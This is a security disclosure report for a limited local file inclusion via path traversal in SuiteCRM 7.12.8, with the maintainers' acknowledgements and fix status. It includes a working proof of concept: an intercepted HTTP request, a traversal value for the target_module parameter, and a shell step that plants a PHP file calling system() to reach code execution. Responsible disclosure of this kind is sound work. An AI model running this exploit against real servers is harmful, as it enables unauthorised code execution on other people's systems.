Limited LFI via Path Traversal in salesagility/suitecrm
Reported on
Nov 29th 2022
Description
A path thraversal vulnerability in SuiteCRM 7.12.8 and earlier allows remote authenticated attackers to include a php file at an arbitrary path via unsanitized request parameters.
Details
In Suite CRM v7.12.8, SubpanelCreates.php and SubpanelEdit.php trust unsanitized user input to load a .php file via require. At least low level user authentication is required to trigger the vulnerability.
// SubpanelCreates.php L44
// User controls target_module
$mod_strings = return_module_language($current_language, $_REQUEST['target_module']);
[...]
// utils.php L1422
// $module is still the user input
$loaded_mod_strings = LanguageManager::loadModuleLanguage($module, $language, $refresh);
[...]
// LanguageManager.php L268
// $module is still the user input
$cachedfile = sugar_cached('modules/').$module.'/language/'.$lang.'.lang.php';
[...]
if (file_exists($cachedfile)) {
global $mod_strings;
require $cachedfile;
[...]
Proof of Concept
1 - Login to SuiteCRM (normal user with default permissions is enough - PoC requires the user to create a "Call")
2 - Navigate to "Calls" - "Create Call" - fill in a subject - "Save"
3 - Now select "Create Note or Attachment" from the "Notes" tab
4 - Intercept the outgoing request - it looks like this:
POST /index.php HTTP/1.1
Host: 10.0.5.4
Content-Length: 418
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http://10.0.5.4
Referer: http://10.0.5.4/index.php?action=DetailView&module=Calls&record=61494278-5f7e-8c0c-8ebe-63860394c556&return_module=Calls&return_action=DetailView&offset=1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: currency=USD; _ga=GA1.1.942238813.1668699570; browserupdateorg=pause; xoops_user_6374ee42=1-004d76ce862be7d3476fa5bed68d529fcc57448ce07ed55dcc3b827801f37c407993b00bbb152419355fd8f86445e6d7da86a1782ef4fdfae3b13ad68c48dca8-ba58b54cd01bef7565aef75880049a8a6c96275c7a5aeb7300f0c8833ea4d4c4ed6ff2afdd46555b0819c3de5c74525754f982ec9b8eef59a2cbed14055afe7d; sid=1; shash=%242y%2410%241X9GGrpnbjXuiqGOwJrkZueXrHY6cCGUKtZ88Abw1euO62sfw6yRe; miniSidebar=1; sugar_user_theme=SuiteP; ck_login_language_20=en_us; Tasks_divs=Tasks_history_v%3Dtrue%23undefined%3D%23Tasks_securitygroups_v%3Dtrue%23; Contacts_divs=Contacts_bugs_v%3Dtrue%23undefined%3D%23; EmailGridWidths=0=10&1=10&2=150&3=250&4=175&5=125; Accounts_divs=Accounts_activities_v%3Dtrue%23undefined%3D%23Accounts_history_v%3Dfalse%23Accounts_documents_v%3Dtrue%23Accounts_contacts_v%3Dtrue%23Accounts_securitygroups_v%3Dtrue%23; ck_login_theme_20=SuiteP; ck_login_id_20=58b402d3-aef6-2b59-a5c9-6385e39c3b6a; Users_divs=Users_aclroles_v%3Dtrue%23undefined%3D%23Users_securitygroups_v%3Dtrue%23; SecurityGroups_divs=SecurityGroups_users_v%3Dtrue%23undefined%3D%23SecurityGroups_aclroles_v%3Dtrue%23; Calls_divs=Calls_contacts_v%3Dtrue%23undefined%3D%23Calls_users_v%3Dtrue%23Calls_leads_v%3Dtrue%23Calls_history_v%3Dtrue%23; sidebartoggle=expanded; PHPSESSID=q0si3s73dopom9kqvnttdjbcmn
Connection: close
target_module=Notes&call_id=61494278-5f7e-8c0c-8ebe-63860394c556&call_name=a&to_pdf=true&tpl=QuickCreate.tpl&return_module=Calls&return_action=DetailView&return_id=61494278-5f7e-8c0c-8ebe-63860394c556&record=&action=SubpanelCreates&module=Home&target_action=QuickCreate&parent_type=Calls&parent_name=a&parent_id=61494278-5f7e-8c0c-8ebe-63860394c556&History_createnoteorattachment_button=Create%20Note%20or%20Attachment
We can now modify the target_module parameter to point to an arbitrary location.
Combined with any sort of file upload (e.g. FTP), this may turn into RCE. In a location that's accessible by the webserver:
# for example in /home/dummy/Documents (could also be an NFS or FTP share)
mkdir language
echo "<?php system('touch /var/www/html/i-was-here.txt'); ?>" > language/en_us.lang.php
Replace target_module with ../../../../../home/dummy/Documents and forward the request. The file i-was-here.txt is now in the web-root.
Mitigation
Sanitize the user input for example by removing . and /.
Notes
Testing was done with SubpanelCreates.php. SubpanelEdits.php contains the same vulnerable lines, however, I was not able to identify a valid entry point for that file during testing. I expect it to be exploitable in the same fashion.
Impact
Using CVSS v3.1 the following vector was determined: AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N.
The impact is entirely dependant on the server environment and context, which is why all impact is rated None except for confidentiality, which is set to Low. If some sort of arbitrary upload exists, remote authenticated attackers can gain remote code execution on the server. Otherwise, the vulnerability is limited by the filename ending in "<path-traversal>/language/'.$lang.'.lang.php'".
Hi crackcat
Thank you for your Security Report.
We have raised the issue from this report with our internal security team to be confirmed.
Below is a reference of the issue raised and ID allocated:
SCRMBT-#219 - Limited LFI via Path Traversal
We will review the issue and confirm it is a vulnerability within SuiteCRM and meets our criteria for a Security issue. If an issue is not considered a Security issue or that it does not need to be private then we'll raise it via the GitHub bug tracker or in a more appropriate place.
Thank you for your contribution to the SuiteCRM project.
Kind Regard
SuiteCRM Security Team
Hi @crackcat,
The Security Team have now assessed the following issue:
- SCRMBT-#219 - Limited LFI via Path Traversal
This issue has been given a severity grading of 'Important'. Due to the severity of this issue we are working to release a fix for it very soon.
Once the fix is released, we aim to include your name in the release notes - giving credit for finding and reporting this issue. Please let us know if you would prefer not be included or have a specific request on how you would like to be referenced within the release notes.
Thank you for your assistance and contribution to the SuiteCRM product!
Kind regards, SuiteCRM Security Team
Hi @maintainer,
Does a release by the end of january seem realistic?
Hi crackcat Our security team has come up with a fix for this issue which is currently being tested. We are unable to give specific timescales, but once it has been fully tested it will go into the next maintenance release.
